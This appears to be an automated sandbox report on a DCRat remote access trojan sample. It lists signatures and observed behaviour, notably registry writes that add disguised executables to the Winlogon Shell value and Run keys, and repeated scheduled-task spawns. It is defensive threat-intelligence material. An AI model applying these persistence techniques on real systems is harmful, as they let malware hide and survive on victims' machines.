Analysis Overview
SHA256
0de2359b17f08c6bb6c9dd20d2e61700013fa90bc63b813d5607ac6542cd0143
Threat Level: Known bad
The file 0de2359b17f08c6bb6c9dd20d2e61700013fa90bc63b813d5607ac6542cd0143 was found to be: Known bad.
Malicious Activity Summary
DcRat
DCRat payload
Modifies WinLogon for persistence
Dcrat family
Process spawned unexpected child process
DCRat payload
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Checks computer location settings
Adds Run key to start application
Drops file in Windows directory
Drops file in Program Files directory
Unsigned PE
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Creates scheduled task(s)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-01 02:49
Signatures
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Dcrat family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-01 02:49
Reported
2024-06-01 02:51
Platform
win7-20240508-en
Max time kernel
122s
Max time network
124s
Command Line
Signatures
DcRat
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Users\\Public\\Videos\\Sample Videos\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\lsass.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\winlogon.exe\", \"C:\\Program Files\\Internet Explorer\\en-US\\csrss.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\Idle.exe\", \"C:\\Users\\Public\\Music\\Sample Music\\services.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Users\\Public\\Videos\\Sample Videos\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\lsass.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\winlogon.exe\", \"C:\\Program Files\\Internet Explorer\\en-US\\csrss.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\Idle.exe\", \"C:\\Users\\Public\\Music\\Sample Music\\services.exe\", \"C:\\MSOCache\\All Users\\sppsvc.exe\", \"C:\\Users\\All Users\\Adobe\\Acrobat\\9.0\\smss.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\Idle.exe\", \"C:\\Windows\\AppPatch\\AppPatch64\\dllhost.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Users\\Public\\Videos\\Sample Videos\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\lsass.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\winlogon.exe\", \"C:\\Program Files\\Internet Explorer\\en-US\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Users\\Public\\Videos\\Sample Videos\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\lsass.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\winlogon.exe\", \"C:\\Program Files\\Internet Explorer\\en-US\\csrss.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\Idle.exe\", \"C:\\Users\\Public\\Music\\Sample Music\\services.exe\", \"C:\\MSOCache\\All Users\\sppsvc.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Users\\Public\\Videos\\Sample Videos\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\lsass.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\winlogon.exe\", \"C:\\Program Files\\Internet Explorer\\en-US\\csrss.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\Idle.exe\", \"C:\\Users\\Public\\Music\\Sample Music\\services.exe\", \"C:\\MSOCache\\All Users\\sppsvc.exe\", \"C:\\Users\\All Users\\Adobe\\Acrobat\\9.0\\smss.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Users\\Public\\Videos\\Sample Videos\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\lsass.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Users\\Public\\Videos\\Sample Videos\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Users\\Public\\Videos\\Sample Videos\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\lsass.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\winlogon.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Users\\Public\\Videos\\Sample Videos\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\lsass.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\winlogon.exe\", \"C:\\Program Files\\Internet Explorer\\en-US\\csrss.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\Idle.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Users\\Public\\Videos\\Sample Videos\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\lsass.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\winlogon.exe\", \"C:\\Program Files\\Internet Explorer\\en-US\\csrss.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\Idle.exe\", \"C:\\Users\\Public\\Music\\Sample Music\\services.exe\", \"C:\\MSOCache\\All Users\\sppsvc.exe\", \"C:\\Users\\All Users\\Adobe\\Acrobat\\9.0\\smss.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\Idle.exe\", \"C:\\Windows\\AppPatch\\AppPatch64\\dllhost.exe\", \"C:\\Windows\\TAPI\\dwm.exe\", \"C:\\Windows\\Setup\\State\\winlogon.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\smss.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Users\\Public\\Videos\\Sample Videos\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\lsass.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\winlogon.exe\", \"C:\\Program Files\\Internet Explorer\\en-US\\csrss.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\Idle.exe\", \"C:\\Users\\Public\\Music\\Sample Music\\services.exe\", \"C:\\MSOCache\\All Users\\sppsvc.exe\", \"C:\\Users\\All Users\\Adobe\\Acrobat\\9.0\\smss.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\Idle.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Users\\Public\\Videos\\Sample Videos\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\lsass.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\winlogon.exe\", \"C:\\Program Files\\Internet Explorer\\en-US\\csrss.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\Idle.exe\", \"C:\\Users\\Public\\Music\\Sample Music\\services.exe\", \"C:\\MSOCache\\All Users\\sppsvc.exe\", \"C:\\Users\\All Users\\Adobe\\Acrobat\\9.0\\smss.exe\", \"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\Idle.exe\", \"C:\\Windows\\AppPatch\\AppPatch64\\dllhost.exe\", \"C:\\Windows\\TAPI\\dwm.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\System.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe |
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\Idle.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Users\\Public\\Music\\Sample Music\\services.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Windows\\AppPatch\\AppPatch64\\dllhost.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Windows\\TAPI\\dwm.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400 = "\"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\System.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\Idle.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Windows\\Setup\\State\\winlogon.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\lsass.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Users\\All Users\\Adobe\\Acrobat\\9.0\\smss.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Windows\\TAPI\\dwm.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\winlogon.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Program Files\\Internet Explorer\\en-US\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\MSOCache\\All Users\\sppsvc.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\lsass.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Windows\\AppPatch\\AppPatch64\\dllhost.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400 = "\"C:\\Users\\Public\\Videos\\Sample Videos\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\winlogon.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
